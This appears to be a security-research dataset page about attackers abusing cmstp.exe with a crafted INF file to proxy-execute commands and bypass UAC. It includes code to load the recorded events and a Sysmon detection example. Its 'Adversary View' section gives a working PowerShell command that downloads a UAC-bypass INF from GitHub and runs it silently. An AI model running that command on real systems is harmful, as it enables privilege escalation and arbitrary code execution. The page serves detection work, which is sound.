CMSTP Proxy Execution
Metadata

| |
---|---
Contributors | Roberto Rodriguez @Cyb3rWard0g
Creation Date | 2020/10/22
Modification Date | 2020/10/22
Tactics |
Techniques |
Tags | art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
Dataset Description

This dataset represents threat actors leveraging CMSTP (cmstp.exe, the Microsoft Connection Manager Profile Installer) to execute an INF file and thereby proxy the execution of other malicious commands (e.g. cmd.exe). The commands are embedded in the RunPreSetupCommandsSection of the INF file, so they run under cmstp.exe when the profile is installed.
Datasets Downloads

Type | Link
---|---
Host | https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip
Adversary View

```powershell
# Fetch the Atomic Red Team T1218.003 INF file, then run it silently with cmstp.exe
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile C:\ProgramData\T1218.003_uacbypass.inf
cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au
```
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive (one JSON-lines file inside the zip)
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) member to the working directory and keep its path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```
Read JSON File

```python
import pandas as pd

# The dataset is newline-delimited JSON, one event per line
df = pd.read_json(datasetJSONPath, lines=True)
```
Access Security Events

```python
# Count events per log channel, most populated channel first
df.groupby(['Channel']).size().sort_values(ascending=False)
```
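The two observables the description and Adversary View give you are the silent cmstp.exe invocation (/s, /au, an .inf path) and the child processes cmstp.exe spawns from RunPreSetupCommandsSection. The following is an added example, not part of the Security-Datasets project, that runs both checks over Sysmon process-creation events in the dataset's JSON-lines layout; the field names (Image, ParentImage, CommandLine, ProcessId, Channel, EventID) are assumed to match Sysmon Event ID 1 as exported in this dataset, and the sample events are constructed.

```python
import json
import ntpath

# Constructed sample events in the dataset's JSON-lines layout (one event per
# line). Field names follow Sysmon Event ID 1 (process creation); the paths and
# process IDs are made up for this example.
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Channel": SYSMON, "EventID": 1, "ProcessId": 4120,
     "Image": "C:\\Windows\\System32\\cmstp.exe",
     "CommandLine": "cmstp.exe /s C:\\ProgramData\\T1218.003_uacbypass.inf /au",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"Channel": SYSMON, "EventID": 1, "ProcessId": 4188,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c start notepad.exe",
     "ParentImage": "C:\\Windows\\System32\\cmstp.exe"},
    {"Channel": SYSMON, "EventID": 1, "ProcessId": 5010,
     "Image": "C:\\Windows\\System32\\cmstp.exe",
     "CommandLine": "cmstp.exe /s C:\\Windows\\Temp\\vpn.inf",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Channel": "Security", "EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe"},
])

def _basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path or "").lower()

def detect_cmstp_proxy_execution(events):
    """Return (rule, ProcessId, detail) tuples for events matching the technique.
    Rule 1: cmstp.exe run with /s and /au and an .inf argument (the Adversary View invocation).
    Rule 2: any process whose parent is cmstp.exe, which is where the commands
            embedded in RunPreSetupCommandsSection actually surface.
    """
    findings = []
    for ev in events:
        if ev.get("Channel") != SYSMON or ev.get("EventID") != 1:
            continue  # only Sysmon process-creation events carry the fields used below
        cmdline = (ev.get("CommandLine") or "").lower()
        tokens = cmdline.split()
        if (_basename(ev.get("Image")) == "cmstp.exe" and "/s" in tokens
                and "/au" in tokens and ".inf" in cmdline):
            findings.append(("cmstp_silent_inf_install", ev["ProcessId"], ev["CommandLine"]))
        if _basename(ev.get("ParentImage")) == "cmstp.exe":
            findings.append(("cmstp_child_process", ev["ProcessId"], ev["Image"]))
    return findings

def analyze_jsonl(text):
    """Parse JSON-lines text (the dataset's on-disk format) and run the detection."""
    return detect_cmstp_proxy_execution(json.loads(l) for l in text.splitlines() if l.strip())
```

To run it over the downloaded dataset instead of the sample, pass `df.to_dict("records")` to `detect_cmstp_proxy_execution`; the third sample event (cmstp.exe with /s but no /au) is deliberately left unflagged by rule 1 to show that the rule keys on the full silent auto-install form.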